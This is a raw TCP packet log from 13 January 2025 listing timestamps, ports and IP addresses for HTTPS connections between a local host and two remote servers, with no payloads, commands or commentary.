Jan 13, 2025 01:49:34.220369101 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.220451117 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.220510006 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.220618963 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.222528934 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.222546101 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.222593069 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.222613096 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.222642899 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.222700119 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.307440042 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.307465076 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.307549953 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.307566881 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.307606936 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.309248924 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.309273958 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.309360981 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.309366941 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.309413910 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.310332060 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.310352087 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.310467958 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.310473919 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.310674906 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.311837912 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.311856985 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.311920881 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.311927080 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.311973095 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.395869017 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.395891905 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.395967960 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.395979881 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.396025896 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.396930933 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.396946907 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.396996021 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.397001028 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.397042036 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.397452116 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.397465944 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.397494078 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.397497892 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.397528887 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.398493052 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.398526907 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.398550034 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.398554087 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.398590088 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.399252892 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.399269104 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.399322987 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.399327993 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.399420023 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.400243998 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.400269032 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.400305033 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.400309086 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.400368929 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.401186943 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.401209116 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.401238918 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.401248932 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.401288986 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.484112024 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.484147072 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.484208107 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.484234095 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.484270096 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.484287977 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.484565973 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.484611034 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.484616995 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.484625101 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.484656096 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.484662056 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:34.484740973 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.484925985 CET	53582	443	192.168.2.6	151.101.66.137
Jan 13, 2025 01:49:34.484940052 CET	443	53582	151.101.66.137	192.168.2.6
Jan 13, 2025 01:49:36.491120100 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.491753101 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.491796017 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.492712021 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.492923021 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.493199110 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.493251085 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.493278027 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.508603096 CET	443	53568	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.508898973 CET	53568	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.508909941 CET	443	53568	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.509919882 CET	443	53568	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.510016918 CET	53568	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.510449886 CET	53568	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.510449886 CET	53568	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.510463953 CET	443	53568	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.510535955 CET	443	53568	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.537071943 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.537097931 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.552429914 CET	53568	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.552450895 CET	443	53568	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.556888103 CET	443	53565	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.557013035 CET	443	53566	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.557122946 CET	53565	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.557137966 CET	443	53565	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.557317019 CET	53566	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.557338953 CET	443	53566	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.557692051 CET	443	53566	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.558198929 CET	53566	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.558198929 CET	53566	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.558212996 CET	443	53566	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.558243990 CET	443	53565	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.558259010 CET	443	53566	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.558676958 CET	53565	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.558676958 CET	53565	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.558693886 CET	443	53565	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.558856010 CET	443	53565	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.583628893 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.595536947 CET	443	53572	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.595927000 CET	53572	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.595942974 CET	443	53572	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.599309921 CET	443	53572	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.599451065 CET	53572	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.599746943 CET	53568	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.599756956 CET	53566	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.599837065 CET	53565	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.600198984 CET	53572	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.600322008 CET	443	53572	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.600367069 CET	53572	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.646392107 CET	53572	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.646452904 CET	443	53572	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.698811054 CET	53572	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.711457968 CET	443	53568	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.711488962 CET	443	53568	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.711550951 CET	443	53568	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.711576939 CET	53568	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.712188005 CET	53568	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.713254929 CET	53568	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.713267088 CET	443	53568	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.744682074 CET	53600	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.744709969 CET	443	53600	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.744894981 CET	53600	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.750636101 CET	53600	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.750649929 CET	443	53600	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.768826962 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.768861055 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.768882036 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.768945932 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.768971920 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.768971920 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.768996000 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.769026995 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.822134972 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.863569975 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.863589048 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.863636971 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.863676071 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.863806009 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.864249945 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.864262104 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.864298105 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.864331007 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.864356995 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.864912987 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.864923954 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.865050077 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.865870953 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.865881920 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.865961075 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.868143082 CET	443	53566	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.868155956 CET	443	53566	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.868207932 CET	443	53566	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.868259907 CET	53566	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.869391918 CET	53566	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.869754076 CET	53566	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.869760036 CET	443	53566	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.872351885 CET	53604	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.872412920 CET	443	53604	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.872536898 CET	53604	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.872769117 CET	53604	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.872781992 CET	443	53604	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.876106024 CET	443	53572	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.876127005 CET	443	53572	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.876266003 CET	443	53572	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.876554012 CET	53572	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.877095938 CET	53572	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.877132893 CET	443	53572	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.881160021 CET	53605	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.881247044 CET	443	53605	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.881438017 CET	53605	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.881548882 CET	53605	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.881584883 CET	443	53605	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.961860895 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.961880922 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.962165117 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.962610960 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.962625980 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.962799072 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.963340998 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.963354111 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.963490963 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.964046955 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.964176893 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.964641094 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.964807987 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.964840889 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.964850903 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.964875937 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.965325117 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:36.965539932 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:36.965636969 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.047794104 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.047935009 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.053767920 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.054042101 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.054157972 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.054327965 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.054362059 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.054373980 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.054399967 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.054502964 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.054728031 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.054836988 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.054884911 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.054939985 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.056781054 CET	53567	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.056799889 CET	443	53567	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.119363070 CET	443	53565	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.119432926 CET	443	53565	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.119457006 CET	443	53565	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.119498014 CET	53565	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.119535923 CET	443	53565	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.119559050 CET	53565	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.119914055 CET	443	53565	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.120064974 CET	53565	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.120069981 CET	443	53565	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.120090008 CET	443	53565	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.120115042 CET	53565	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.120347977 CET	53565	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.120352983 CET	443	53565	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.120378971 CET	53565	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.126472950 CET	53607	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.126589060 CET	443	53607	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.126724005 CET	53607	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.127002954 CET	53607	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.127017021 CET	443	53607	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.157459974 CET	53608	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.157502890 CET	443	53608	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.158397913 CET	53609	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.158433914 CET	443	53609	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.158499956 CET	53608	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.158505917 CET	53609	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.158917904 CET	53609	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.158931971 CET	443	53609	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:37.159329891 CET	53608	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:37.159344912 CET	443	53608	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.295954943 CET	443	53600	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.296413898 CET	53600	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.296423912 CET	443	53600	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.299794912 CET	443	53600	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.299865961 CET	53600	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.300853014 CET	53600	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.300853014 CET	53600	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.300931931 CET	443	53600	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.346651077 CET	53600	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.346658945 CET	443	53600	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.381634951 CET	443	53604	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.389195919 CET	53600	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.394471884 CET	53604	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.394499063 CET	443	53604	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.395539045 CET	443	53604	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.395677090 CET	53604	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.396017075 CET	53604	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.396076918 CET	443	53604	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.396264076 CET	53604	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.396270037 CET	443	53604	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.408513069 CET	443	53605	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.439683914 CET	53604	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.455653906 CET	53605	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.523895979 CET	53605	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.523932934 CET	443	53605	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.525614023 CET	443	53605	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.525693893 CET	53605	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.533215046 CET	53605	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.533302069 CET	443	53605	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.533896923 CET	53605	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.533904076 CET	443	53605	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.582273960 CET	53605	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.683988094 CET	443	53609	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.718111038 CET	443	53604	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.718156099 CET	443	53604	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.718163967 CET	443	53604	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.718211889 CET	53604	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.718252897 CET	443	53604	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.718266010 CET	53604	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.721194029 CET	443	53604	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.721242905 CET	53604	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.723921061 CET	53609	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.726649046 CET	443	53600	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.726681948 CET	443	53600	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.726726055 CET	53600	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.726736069 CET	443	53600	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.726767063 CET	443	53600	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.726778984 CET	53600	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.726803064 CET	53600	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.734077930 CET	53609	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.734101057 CET	443	53609	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.734518051 CET	443	53609	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.734580994 CET	443	53608	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.737488031 CET	53609	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.737561941 CET	443	53609	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.737663984 CET	53609	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.738413095 CET	53608	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.738436937 CET	443	53608	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.738823891 CET	443	53608	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.739399910 CET	53608	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.739470959 CET	443	53608	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.739540100 CET	53608	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.779346943 CET	443	53609	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.781487942 CET	443	53605	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.781514883 CET	443	53605	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.781601906 CET	53605	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.781634092 CET	443	53605	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.781678915 CET	53605	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.781987906 CET	443	53605	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.782049894 CET	443	53605	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.782094955 CET	53605	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.783339024 CET	443	53608	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.839993000 CET	443	53607	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.846216917 CET	53607	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.846302032 CET	443	53607	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.849950075 CET	443	53607	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.850055933 CET	53607	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.856496096 CET	53607	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.856753111 CET	443	53607	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.859556913 CET	53607	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:39.859574080 CET	443	53607	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:39.915358067 CET	53607	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.001121044 CET	53600	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.001142025 CET	443	53600	89.250.71.221	192.168.2.6
